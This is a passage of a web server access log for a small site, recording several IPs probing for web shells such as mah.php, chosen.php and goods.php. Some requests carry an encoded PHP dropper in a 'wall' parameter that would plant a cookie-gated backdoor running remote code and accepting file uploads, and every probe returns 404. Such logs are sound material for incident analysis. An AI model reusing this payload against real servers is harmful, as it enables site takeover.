(KHTML, like Gecko) Chrome/56.0.2933.21 Safari/537.36"
144.76.19.70 - - [07/Dec/2025:19:02:32 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)"
144.76.19.70 - - [07/Dec/2025:19:02:32 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)"
192.121.16.196 - - [07/Dec/2025:19:04:05 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:19:04:16 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:19:04:17 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:18:35:23 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2806.37 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:35:24 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2806.37 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:35:24 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2806.37 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:35:25 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2806.37 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:18:44:58 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0"
194.68.32.135 - - [07/Dec/2025:18:44:59 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0"
45.227.253.15 - - [07/Dec/2025:18:57:38 +0000] "GET /index.php/jk HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_1_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5"
192.121.16.196 - - [07/Dec/2025:19:04:17 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [07/Dec/2025:19:14:01 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 5.1; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [07/Dec/2025:19:14:02 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 5.1; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [07/Dec/2025:19:14:02 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 5.1; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [07/Dec/2025:18:45:00 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0"
192.121.16.196 - - [07/Dec/2025:18:54:06 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.21 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:54:09 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.21 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:54:21 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.21 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:54:21 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.21 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:19:14:03 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 5.1; rv:45.0) Gecko/20100101 Firefox/45.0"
37.112.223.135 - - [07/Dec/2025:19:23:35 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:19:23:36 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:19:23:36 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:19:32:32 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [07/Dec/2025:19:32:34 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [07/Dec/2025:19:04:18 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0"
